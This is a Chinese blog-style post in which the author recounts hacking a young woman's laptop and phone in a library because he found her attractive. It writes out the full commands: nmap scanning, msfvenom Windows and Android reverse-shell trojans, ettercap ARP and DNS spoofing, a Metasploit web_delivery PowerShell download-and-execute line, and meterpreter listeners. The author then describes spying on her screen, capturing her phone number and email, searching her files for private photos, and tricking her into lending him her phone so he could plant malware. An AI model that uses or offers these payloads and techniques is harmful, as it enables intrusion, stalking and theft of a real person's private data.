缘起缘落：简单来说，图书馆看见一个妹子长得还不错，然后.....

此处应该有图镇楼，我就不放了，上次放出来一大堆人找我要微信号....

环境分析：

看到这个妹子的第一眼，我顺带注意到了她桌上的笔记本（为什么这样说呢，因为我不敢上去问啊...只能从目标设备入手）

一个官方开放的WIFI

一个十分神器的书包（笔记本，平板，手机三件套，无人机等一堆黑科技若干）

一个风水十分好的位置（MM背后，可以窥屏省去了一大堆用技术装逼的步骤）

打开笔记本，连上WIFI，查看本地IP地址

Root@promote:~# ifconfigeth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.1.123 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 fe80::20c:29ff:fe18:1e36 prefixlen 64 scopeid 0x20<link> ether 00:0c:29:18:1e:36 txqueuelen 1000 (Ethernet) RX packets 34 bytes 2820 (2.7 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 48 bytes 3407 (3.3 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1 (Local Loopback) RX packets 20 bytes 1116 (1.0 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 20 bytes 1116 (1.0 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

确定目标内网IP，内网神器nmap，IP最后一位数是从0到255，这里我用sP参数扫描这个数值中存活的IP地址。

root@promote:~# nmap -sP 192.168.1.0/24 Starting Nmap 7.40 ( [url][/url] ) at 2017-06-25 22:35 CSTNmap scan report for bogon (192.168.1.1)Host is up (0.0012s latency).MAC Address: 44:97:5A:A2:CE:FE (Shenzhen Fast Technologies)Nmap scan report for bogon (192.168.1.106)Host is up (0.00019s latency).MAC Address: A8:1E:84:28:81:6F (Quanta Computer)Nmap scan report for bogon (192.168.1.123)Host is up.Nmap done: 256 IP addresses (3 hosts up) scanned in 2.34 seconds

如上：这是我模拟的环境，其实当时的话远不止这几个IP，那么如何确定那个是我们目标的IP地址呢，这里我用了一种最笨的方法，当时的话，由于是刚开放不久，图书馆内的人不是很多，大致看了一下，当时局域网内的设备：前台电脑（win10），我（kali），目标电脑（win7），手机若干（Android IOS），所以我只需要确定那个IP是win7那么那个就是我们的目标IP，当然也可以使用wireshark抓包或者其他方法进行判断。（注：win7的虚拟机抽风了，这里用win10代替吧）

这里使用nmap的-O参数进行判断

root@promote:~# nmap -O 192.168.1.106 Starting Nmap 7.40 ( [url][/url] ) at 2017-06-25 22:37 CSTNmap scan report for bogon (192.168.1.106)Host is up (0.00038s latency).Not shown: 993 closed portsPORT STATE SERVICE80/tcp open http135/tcp open msrpc139/tcp open netbios-ssn443/tcp open https445/tcp open microsoft-ds902/tcp open iss-realsecure912/tcp open apex-meshMAC Address: A8:1E:84:28:81:6F (Quanta Computer)Device type: general purposeRunning (JUST GUESSING): Microsoft Windows 10|Vista|7|8.1|2008|Longhorn|2016 (96%)OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2008 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2016Aggressive OS guesses: Microsoft Windows 10 (96%), Microsoft Windows Vista, Windows 7 SP1, or Windows 8.1 Update 1 (93%), Microsoft Windows 10 1511 (92%), Microsoft Windows 10 build 10074 - 10586 (92%), Version 6.1 (Build 7601: Service Pack 1) (92%), Microsoft Windows 10 build 10586 (89%), Microsoft Windows Vista SP2 or Windows 7 Ultimate SP0 - SP1 (89%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (88%), Microsoft Windows 7 or Windows Server 2008 R2 (88%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (88%)No exact OS matches for host (test conditions non-ideal).Network Distance: 1 hop OS detection performed. Please report any incorrect results at [url][/url] .Nmap done: 1 IP address (1 host up) scanned in 5.20 seconds

那么确立的目标以后如何实施入侵呢，我这里想到的是使用系统开放端口进行入侵，使用-O参数的时候会顺带探测目标主机开放的端口服务，一般个人使用的电脑并不会开发太多的端口服务，亮点445端口，用爆出一个MS17-010。msf进行测试无果，随后我又尝试通过其他端口服务，但是.......

按照我猥琐的程度，我可能就这样放弃吗？

脑子灵光一闪，既然主动出击不行，那么我可不可以迂回生成一个木马通过DNS劫持诱导目标下载并运行木马，让木马反连到我这台机器，从而入侵目标主机。

果断打开metasploit，敲入以下命令，-P参数指定payload的，这里使用的是tcp反连的payload，也就是说当目标运行我们的木马以后，木马会向预设的IP地址和端口发起TCP请求，而我们只需要在攻击机器上设置监听，如果监听到有请求以后，会建立一个meterpreter会话，通过这个会话我们可以.........

root@book:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=4444 -f exe > 1.exeNo platform was selected, choosing Msf::Module::Platform::Windows from the payloadNo Arch selected, selecting Arch: x64 from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 510 bytesFinal size of exe file: 7168 bytes 启动metasploit进行监听。msf > use exploit/multi/handler //载入模块msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp //载入payload，与生成木马的payload一致payload => windows/x64/meterpreter/reverse_tcpmsf exploit(handler) > show options //查看需要设置的选项 Module options (exploit/multi/handler):  Name Current Setting Required Description ---- --------------- -------- -----------  Payload options (windows/x64/meterpreter/reverse_tcp):  Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port  Exploit target:  Id Name -- ---- 0 Wildcard Target  msf exploit(handler) > set LHOST 192.168.1.123 //设置监听IP地址LHOST => 192.168.1.123msf exploit(handler) > set LPORT 4444 //设置监听端口LPORT => 4444msf exploit(handler) > run //开始监听 Started reverse TCP handler on 192.168.1.123:4444Starting the payload handler...Sending stage (1189423 bytes) to 192.168.1.106Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.106:21435) at 2017-06-25 22:52:03 +0800Sending stage (1189423 bytes) to 192.168.1.106[-] OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=unknown state: tlsv1 alert protocol version

DNS劫持：

终端输入

Vim /etc/ettercap/etter.dns

，修改dns文件

* 通配符 代表所有域名

A和PTR后面的就是指向地址，因为使用的是通配符，也就是说当我们开启劫持以后，目标无论访问什么样的站点，最后都会指向到我们kali的这台机器

Service apache2 start 开启apache服务

终端输入ettercap -G，运行GUI界面

依次选择sniff->unified sniffing(选择网卡)->hosts-> scan for host(扫描主机)->host list(查看列表) ，在这里可以看到扫描出来的主机列表，192.168.1.1是我路由器的地址，也就是网关。192.168.1.106是目标主机，这里把网关添加为目标1，把目标添加为目标2.

然后选择arp posonig选项卡，勾选上sniff remote connections 嗅探远程连接

然后CTRL+P调出插件目录，或者点击plugins选项卡，选择第一个，选择并双击dns_spoof这个插件，双击以后前面会显示一个星号，选择strat选项卡点击start sniffing开启劫持。

root@book:~$ cp test.exe /var/www/html //把木马copy到站点根目录。

做完以上步骤以后，静静地等待目标中招，大约过了五分钟，可能还不止，目标终于关闭了WPS，打开了久违的浏览器。激动的回到我的桌面，静静的等待木马的反连请求。但是等了好久，metasploit始终没收到来自木马的反连请求，这不禁让我感到很尴尬。腚眼一看，我看到了这个。。

你的好友老周以上线，并给了你一个么么哒。

当时的我哭晕在厕所。。。很好，我要放大招了.

Windows PowerShell 是一种命令行外壳程序和脚本环境，使命令行用户和的强大功能。powershell因为一些特征会被大多数杀软所忽视掉，虽然能查出是病毒，但是在执行的时候杀软鸟都不鸟你。

msf > use exploit/multi/script/web_delivery //载入模块msf exploit(web_delivery) > info //查看需要设置的选项 Name: Script Web DeliveryModule: exploit/multi/script/web_deliveryPlatform: Python, PHP, WindowsPrivileged: NoLicense: Metasploit Framework License (BSD)Rank: ManualDisclosed: 2013-07-19 Provided by: Andrew Smith "jakx" <[email]jakx.ppr@gmail.com[/email]> Ben Campbell <[email]eat_meatballs@hotmail.co.uk[/email]> Chris Campbell Available targets: Id Name -- ---- 0 Python 1 PHP 2 PSH Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Payload information: Description: This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. References: [url][/url][url][/url] [url][/url] [url][/url] msf exploit(web_delivery) > set URIPATH / 设置为根路径URIPATH => /msf exploit(web_delivery) > set target 2 //设置保存文件的类型，这里是PSHtarget => 2msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp //payloadpayload => windows/meterpreter/reverse_tcpmsf exploit(web_delivery) > show options //查看设置选项 Module options (exploit/multi/script/web_delivery):  Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH / no The URI to use for this exploit (default is random)  Payload options (windows/meterpreter/reverse_tcp):  Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port  Exploit target:  Id Name -- ---- 2 PSH  msf exploit(web_delivery) > set LHOST 192.168.1.123 //设置反连IPLHOST => 192.168.1.123msf exploit(web_delivery) > set LPORT 4444 //设置反连端口LPORT => 4444msf exploit(web_delivery) > run //配置好选项直接run，msf会自动生成一端pwoershell的代码Exploit running as background job.Started reverse TCP handler on 192.168.1.123:4444Using URL: [url][/url]Local IP: [url][/url]Server started.Run the following command on the target machine:powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring(''); 生成的powershell代码

这段代码，我们可以把他保存为bat文件或者是利用其他的一些漏洞结合，然后copy到站点根目录下，开启劫持诱导目标下载执行，当目标运行以后，监听请求建立会话。

msf exploit(web_delivery) > 192.168.1.106 web_delivery - Delivering PayloadSending stage (957487 bytes) to 192.168.1.106Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.106:21669) at 2017-06-25 22:59:02 +0800sessions 1Starting interaction with 1... meterpreter >

拿到会话以后，我可以干很多的事情，比如开启她的摄像头，搞个键盘记录。那么我是直接打开了vnc进行窥屏，妈妈再也不用担心窥屏被人发现了。。。倒霉了十几年，幸运女神终于站到了我这边，当时妹子正在填写报名表，果断截屏拿到手机号和邮箱。而后DOS命令搜索比较有价值的文件。比如：.jpg .png等图片文件看能不能获取到一些比较不可描述的照片，doc wps文件，这类文档可能是报名表或者其他的一些文档极有可能存在家庭住址，所在学校等信息。

然而搜了大半天，并没有什么有价值的东西。而后我又把目标转移到了妹子的手机，国产华为，难得见到一个妹子拿的不是iPhone。

利用我在公网的一台Ubuntu服务器生成一个apk的木马，达到长久控制的效果。

root@book:~$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT = 4444 R > test.apkNo platform was selected, choosing Msf::Module::Platform::Android from the payloadNo Arch selected, selecting Arch: dalvik from the payload Error: The following options failed to validate: LPORT. msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcpPAYLOAD => android/meterpreter/reverse_tcpmsf exploit(handler) > show options Module options (exploit/multi/handler):  Name Current Setting Required Description ---- --------------- -------- -----------  Payload options (android/meterpreter/reverse_tcp):  Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen port  Exploit target:  Id Name -- ---- 0 Wildcard Target  msf exploit(handler) > set LHOST 192.168.1.123LHOST => 192.168.1.123msf exploit(handler) > run [-] Handler failed to bind to 192.168.1.123:4444:- -Started reverse TCP handler on 0.0.0.0:4444Starting the payload handler...

接下来就是套路和对目标心理活动的把握，好歹我也是读过《欺骗的艺术》的人，机智的我，把手机关机，秒变奥斯卡影帝。当时大致情况是这样：首先我把手机拿到桌底下关机，然后装模作样打电话。什么爷爷突然住院了，怎么会这样啊，要说得大声点，然后手机没电了。然后走过去，美女能借个手机吗，我爷爷住院了，我手机没电了诸如之类，反正就是一顿忽悠。最后在我强大的演技之下，妹子终于同意把手机借我了。接下来.......

回到桌位之上，ubuntu已经成功的接收到了一个会话，故技重施，手机的话我去搜了手机内的照片和QQ和微信的缓存记录，发现了一大堆有意思的东西。

欢迎各位小伙伴私信群号，一起进群van